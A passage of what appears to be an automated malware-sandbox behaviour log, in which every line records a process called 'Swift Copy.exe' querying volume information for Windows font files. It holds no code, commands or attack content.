          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
